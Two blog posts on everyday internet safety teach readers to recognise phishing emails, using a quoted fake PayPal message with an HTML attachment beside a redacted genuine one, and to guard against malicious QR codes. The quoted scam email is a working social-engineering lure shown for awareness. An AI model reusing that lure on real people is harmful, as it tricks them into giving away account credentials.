Protect yourself from fraudulent emails.

If you see an email with links you can click on what should you do?  Well, I will tell you what you should not do.  You should not click on them unless you know what you are doing.  I will give you an example from the real world.  This comes from my very own email inbox.  First, I will tell you that the sender of the email was “PayPal” (not the real one) and the message was this:

Dear Valued Member of PayPal, A very unusual activity has been detected that was linked to your PayPal account. It appears that someone gained access to your account without your consent. This intrusion have led us to restrict your account access. In order for you to have full access to your account again, please follow these two simple steps. (1) Download the attachment provided by our Security Team. (2) Open the attached file (in your Web Browser) and fill in the required fields. After you have verified your account by following these steps, our automated security system will add layers of protection to your account. We would like to thank you for your serious attention. Sincerely, PayPal Account Review Department

What do you think was the first thing I did about this? If you cannot guess, I will tell you that I opened a separate browser and logged into my account. No problems at all. The account was just fine. Now the first thing you should notice about this email is that they are asking you for personal and sensitive information by downloading an attachment which in this case was an html file. No legitimate company will ever ask you to click on anything which might compromise your privacy. That should be your first clue that this is a scam email. Your second clue should be that they are referring to you as if they have no clue what your name is or any reference that they know anything about you. Which is exactly what one might expect from a mass mailing designed to scam people. Your third clue is the bad English – “have led us” should be “has led us” because “intrusion” is singular and present tense, at least in my opinion though this might be arguable. I’m not an expert in English grammar but this just sounds awkward to me.

The senders email address was accounts@intl6.paye.com which is very similar to a real PayPal email address (service@intl.paypal.com). Granted there are many many large departments within any organization like PayPal so there are many email addresses that they use. I say to that, if in doubt, open a new browser, go to the main web page yourself and find out who to contact regarding an email they allegedly sent. But don’t under any circumstances reveal any personal information from within the email. In fact, don’t reply to it at all. Go directly to the real web page by typing in the address yourself. As an aside, if you get an email asking if you want to change a subscription status (such as a newsletter) do not, like some of my clients have done, reply to an email hoping to get taken off an email mailing list, especially if you are unfamiliar with the sender. If you do that, all you’ve accomplished is to verify that your email address is a legitimate one and can be sold. Go directly to the web site in question where you will almost always find links to remove yourself from any mailing lists.

Note that often you forget a password when you want to log into your favorite site so you click on the “Forgot Password” link, which sends you an email with a link you can click on to reset your own password. This is legitimate and an action which you yourself have initiated so it is OK in this case to click on the link. However, it is still better in my opinion to copy the link and paste it into a new page on your web browser anyway. You may as well make it a habit.

If you see a link in your Internet browser, or in your email program, you can check its validity by merely hovering your mouse over the link without clicking on it. For example, here is a link I have created that links to the web site Google.

http://www.google.ca

Now hold you mouse over the link and you will see the real URL of the link. By the way, the term “URL” stands for “Uniform Resource Locater” which is a geek way of saying “Internet Address”. You will see the real URL appear in the bottom bar at the lower left of your browser window. In Firefox, this is true and also in Internet Explorer and even in the Google Chrome and Safari browsers. The real URL always appears in the lower left when you hover your mouse over the link.

Here is another example:

http://www.google.ca

Now hover your mouse over this link and check out the real URL in the lower left bar of your browser window. What do you see there? Anything suspicious at all? (This is not a real web site so do not try to click on it it will just open an error page). The point is that if you were to click on this link you would be taken to a web site that looks legitimate but is designed to steal your stuff. It is incredibly easy to fake a web site that looks like the real thing. All you have to do to cover your nasty data thieving web site code is to copy and paste a picture of a real web site. Looks like the real thing, but it does things you don’t want to have done to you.

I have not tested all the possible email programs out there, but of the email clients I have tested (Outlook, Outlook Express, Windows Mail, Windows Live Mail) and also in web based email programs such as SquirrelMail they work in a similar way except that when you hover your mouse over a link the real URL appears in a balloon pop-up right beside your mouse cursor.

So I will now post another real email I got just to demonstrate something to you. This is from the real PayPal:

Hello Jar Media Ltd.,

You recently attempted to transfer funds from your bank account to
your PayPal account.

Your bank declined the funds transfer on Dec 16, 2011.

We have charged your credit card, which you choose as your backup
funding source, to complete your payment to xxxx@xxxxxxxxx.com.

—————————————————————-
Transaction Details
—————————————————————-
Transaction Type: Instant Transfer payment to xxxxxxxxxxx.com
Transaction ID: xxxxxxxxxxxxxxx
Transaction Date: Dec 10, 2011
Transaction Amount: $xxx.xx CAD
Item number: xxxxxxxxxxxx

Thanks,

PayPal

—————————————————————-
PROTECT YOUR PASSWORD

NEVER give your password to anyone, including PayPal employees.
Protect yourself against fraudulent websites by opening a new web
browser (e.g. Internet Explorer or Firefox) and typing in the PayPal
URL every time you log in to your account.

—————————————————————-

Please do not reply to this email. This mailbox is not monitored and
you will not receive a response. For assistance, log in to your
PayPal account and click the Help link in the top right corner of
any PayPal page.

—————————————————————-
Copyright © 1999-2011 PayPal. All rights reserved.

PPID PP020

I want you to notice four things about this legitimate email. The first is that I replaced real number and email addresses with xxx’s because they are none of your business, frankly. The second thing I want you to notice is that they addressed the company account Jar Media Ltd., not some random impersonal “valued member”. The third thing is that they never once asked me for any personal information. Finally, the fourth thing I want you to notice is that paragraph they included under “PROTECT YOUR PASSWORD”. By the way, the problem was a bank mistake and not that we are shiftless losers, ha ha! The account was fine but a glitch caused the transaction to not be approved in time hence the fall back to the credit card. Notice they did not ask for my account number, they did not publish in the email any account information whatsoever.

In future posts, I will talk about on-line security when shopping. I will also address how you can protect yourself from bogus software pop-ups when browsing the Internet. You know, the ones that pop up to tell you your computer is infected by a virus and you should click on the perfect anti virus program? For now, I’ll just say you should never take the bait. That way I won’t have to carry your dead computer carcass home to disinfect it.

Peace.

Posted in Internet Safety | 1 Comment

QR Codes: How to protect yourself from malicious QR codes.

QR codes mostly look like this, although they can be much more artistic and look a lot like pictures:

An example of a QR code generated by me which takes you to our web site

 

If you have a smart phone you can read these things.  Whether inside a retail store somewhere or at a bus stop, or printed in magazines, these codes are everywhere.  A smart phone can scan these and they then perform certain actions automatically.  They are like a bar code, but they can carry a lot more information.

Here is a simplified version of how this works: You activate your smart phone camera in order to scan the image.  Software inside your phone reads the binary bits and converts the image to code which is then acted upon.  The process is extremely complicated in detail so to say that the software sees a black pixel and converts it to a binary bit is a gross oversimplification, but that is essentially how it works.  It does this extremely fast.

What the software ultimately reads, is an instruction to perform an action.  That action may be to open an Internet browser and go to a web site (such as the QR code example above), or it may open a Google map with the directions to get to a retail outlet, or it could dial a phone number or merely open a small text file containing an advertisement or a discount coupon or code.

This is all a great deal of fun and very useful but there is a problem.  The problem is security.  It is incredibly easy for someone to generate a malicious QR code which can attack your security in various ways limited only by the actions QR codes are capable of.  It can take you to a spoofed web site, and compromise your sensitive information.  I could, if I wished, print out dozens of QR codes and peel and stick them to bus stops, power line poles, or anywhere the things can stick to.  I can even place them over a legitimate QR code from a local retail chain which might be trusted by an unsuspecting client to be safe to scan.  The security problem exists in that there is no way to tell what is in the QR codes except by scanning it.  Even if you were to print below it that this code will take you to a safe web site…well that could be a lie too.

So how can you protect yourself?  You can protect yourself in two ways.  The first way is to never scan them.  The more practical way is as follows:  The answer is no one can protect themselves at all times but you can do some things which minmize the risk.  For example, you might think it is OK for you to download a free QR code scanner application for your smart phone.  And it is OK in that these apps work fine.  The problem is that they probably automatically run the action specified in the QR code immediately without your permission.  Free apps often have no settings to protect you.  I recommend you pay for your apps.  Make sure that the app you pay for (or the free app) is capable of allowing you to shut off the autorun features of QR codes.  For example, I have a free app which autoruns QR codes.  No options to stop that other than simply not scanning.  I also have a paid app which allows you to examine the code’s action before running it.  Thus, if I scan a code that takes me to www.someretailer.com here is what happens with my QR codes app:  Nothing at all because I set it that way.  I can then look at the code generated and see that yes, it is indeed a web site (as opposed to a discount coupon code text file for example) and no harm in going there.  I can then choose to go there or not.

With my free app, it goes there instantly and automatically.  Which is no problem because it is a well known and respected retailer or retail Internet commerce web site.

Question: What if it is instead something like this?

www.thisisamaliciouswebsite.com/wearegoingtostealyourinformation.php

With the free app you will see the familiar but faked web site you know and love.  With the paid app, or at least with a free app that allows you to control it, you will see the real URL and know that something is up.

Which brings me finally, to say something about free apps in general.  Free apps just are not free.  There is always always always a ‘catch’.  Granted, most ‘catches’ are harmless and friendly, but most are annoying and even harmful.  You get do not get what you do not pay for, in other words.  It is the same with free software off the Internet.  Downloader beware!

Having warned you about free apps and free software, there are plenty of legitimate software packages which are indeed extremely high quality and free such as OpenOffice by Sun Microsystems, and WordPress, and many others possibly written under the GNU GPL license.  This is open source software written by people who just love writing software.

Being aware of security risks is the first step to taking control of your own security.  Have fun scanning QR codes now that you know the risks!  I will discuss other security issues in another post soon after this holiday season.  So whatever your beliefs, have a great holiday season everyone and see you in the new year!

Posted in Internet Safety | 2 Comments